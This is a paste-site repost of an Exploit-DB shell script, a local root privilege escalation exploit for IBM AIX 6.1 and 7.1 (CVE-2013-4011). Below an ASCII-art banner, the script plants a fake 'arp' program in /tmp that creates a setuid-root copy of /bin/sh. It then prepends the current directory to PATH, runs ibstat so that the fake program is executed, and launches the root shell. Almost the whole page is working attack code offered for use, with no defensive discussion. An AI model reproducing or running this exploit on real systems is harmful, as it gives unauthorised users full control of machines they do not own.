IBM AIX 6.1 / 7.1 - Local root Privilege Escalation


SUBMITTED BY: Guest

DATE: Nov. 25, 2013, 12:18 a.m.

FORMAT: Text only

SIZE: 2.1 kB

HITS: 2133

  1. #
  2. # EDB Note: Screenshot provided by exploit author
  3. #
  4. #!/bin/sh
  5. # Exploit Title: IBM AIX 6.1 / 7.1 local root privilege escalation
  6. # Date: 2013-09-24
  7. # Exploit Author: Kristian Erik Hermansen <kristian.hermansen@gmail.com>
  8. # Vendor Homepage: http://www.ibm.com
  9. # Software Link: http://www-03.ibm.com/systems/power/software/aix/about.html
  10. # Version: IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02
  11. # Tested on: IBM AIX 6.1
  12. # CVE: CVE-2013-4011
  13. echo '
  14. mm mmmmm m m
  15. ## # # #
  16. # # # ##
  17. #mm# # m""m
  18. # # mm#mm m" "m
  19. '
  20. echo "[*] AIX root privilege escalation"
  21. echo "[*] Kristian Erik Hermansen"
  22. echo "[*] https://linkedin.com/in/kristianhermansen"
  23. echo "
  24. +++++?????????????~.:,.:+???????????++++
  25. +++++???????????+...:.,.,.=??????????+++
  26. +++???????????~.,:~=~:::..,.~?????????++
  27. +++???????????:,~==++++==~,,.?????????++
  28. +++???????????,:=+++++++=~:,,~????????++
  29. ++++?????????+,~~=++++++=~:,,:????????++
  30. +++++????????~,~===~=+~,,::,:+???????+++
  31. ++++++???????=~===++~~~+,,~::???????++++
  32. ++++++++?????=~=+++~~~:++=~:~+???+++++++
  33. +++++++++????~~=+++~+=~===~~:+??++++++++
  34. +++++++++?????~~=====~~==~:,:?++++++++++
  35. ++++++++++????+~==:::::=~:,+??++++++++++
  36. ++++++++++?????:~~=~~~~~::,??+++++++++++
  37. ++++++++++?????=~:~===~,,,????++++++++++
  38. ++++++++++???+:==~:,,.:~~..+??++++++++++
  39. +++++++++++....==+===~~=~,...=?+++++++++
  40. ++++++++,........~=====..........+++++++
  41. +++++................................++=
  42. =+:....................................=
  43. "
  44. TMPDIR=/tmp
  45. TAINT=${TMPDIR}/arp
  46. RSHELL=${TMPDIR}/r00t-sh
  47. cat > ${TAINT} <<-!
  48. #!/bin/sh
  49. cp /bin/sh ${RSHELL}
  50. chown root ${RSHELL}
  51. chmod 4555 ${RSHELL}
  52. !
  53. chmod 755 ${TAINT}
  54. PATH=.:${PATH}
  55. export PATH
  56. cd ${TMPDIR}
  57. /usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null
  58. if [ -e ${RSHELL} ]; then
  59. echo "[+] Access granted. Don't be evil..."
  60. ${RSHELL}
  61. else
  62. echo "[-] Exploit failed. Try some 0day instead..."
  63. fi

comments powered by Disqus